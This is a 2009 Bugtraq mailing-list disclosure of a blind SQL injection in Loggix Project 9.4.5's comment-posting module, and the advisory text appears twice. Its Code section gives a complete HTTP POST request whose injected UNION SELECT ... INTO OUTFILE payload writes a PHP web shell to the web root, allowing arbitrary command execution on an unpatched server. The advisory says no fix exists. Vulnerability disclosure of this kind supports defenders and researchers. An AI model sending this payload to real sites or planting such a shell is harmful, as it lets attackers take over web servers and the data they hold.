Loggix Project 9.4.5 Blind SQL Injection

To: Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>, str0ke <str0ke@xxxxxxxxxxx>
Subject: Loggix Project 9.4.5 Blind SQL Injection
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@xxxxxxxxx>
Date: Fri, 10 Apr 2009 16:37:29 +0200
Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type; bh=t34QWDHmqd/sMG4QagZKLBjDhyzgPceyCuCS3glqGZ8=; b=jdB2khReah9ml1LjZNXOVmglrYoreHWTQ+sc1BrRlKWXiJzTKtxc2gXSGRHgk0jiIr Gj0mSFLLd0SlOdFLGWxsJdbSMnajjoWPYOdwd3THPwUJQAbm2b4CbylGKjlO1sMTDytA Jhhd00+yBAi/FGwLyU+KenpfDdVwO10ij5o8U=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=HzJMbzj/bVP9jUopDVHxL8SEPep/YIBeNnOUfqUtZ8jRvXwYLV/pFOKpY6euLVAKyX hpan+hSy3YcKLk81/afct4METXQmUWcP5wZBylmQNOLKYijdQTTGvIHc1EjVFcdLyyFd li1lWrNIsqaN6jUlHNuoJISwPHwY1NU6xYHrQ=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

*******   Salvatore "drosophila" Fresta   *******

[+] Application: Loggix Project
[+] Version: 9.4.5
[+] Website: http://loggix.gotdns.org

[+] Bugs: [A] Blind SQL Injection

[+] Exploitation: Remote
[+] Date: 10 Apr 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@xxxxxxxxx


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] Blind SQL Injection

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: modules/comment/post.php

This bug allows a guest to execute arbitrary
queries.


*************************************************

[+] Code


- [A] Blind SQL Injection

POST /path/modules/comment/post.php HTTP/1.1\r\n
Host: site\r\n
Keep-Alive: 300\r\n
Connection: keep-alive\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 177\r\n
\r\n
title=title&comment=comment&user_name=user&user_pass=password&parent_key=key&refer_id=-1'
UNION ALL SELECT '<?php system($_GET['cmd']); ?>' INTO OUTFILE
'/var/www/htdocs/rce.php


*************************************************

[+] Fix

No fix.


*************************************************

-- 
Salvatore "drosophila" Fresta
CWNP444351

*******   Salvatore "drosophila" Fresta   *******

[+] Application: Loggix Project
[+] Version: 9.4.5
[+] Website: http://loggix.gotdns.org

[+] Bugs: [A] Blind SQL Injection

[+] Exploitation: Remote
[+] Date: 10 Apr 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@xxxxxxxxx


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] Blind SQL Injection

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: modules/comment/post.php

This bug allows a guest to execute arbitrary
queries.


*************************************************

[+] Code


- [A] Blind SQL Injection

POST /path/modules/comment/post.php HTTP/1.1\r\n
Host: site\r\n
Keep-Alive: 300\r\n
Connection: keep-alive\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 177\r\n
\r\n
title=title&comment=comment&user_name=user&user_pass=password&parent_key=key&refer_id=-1'
 UNION ALL SELECT '<?php system($_GET['cmd']); ?>' INTO OUTFILE 
'/var/www/htdocs/rce.php


*************************************************

[+] Fix

No fix.


*************************************************

Prev by Date: [ MDVSA-2009:089 ] opensc
Next by Date: Summer Camp Garrotxa 2009 event
Previous by thread: [ MDVSA-2009:089 ] opensc
Next by thread: Summer Camp Garrotxa 2009 event
Index(es):
- Date
- Thread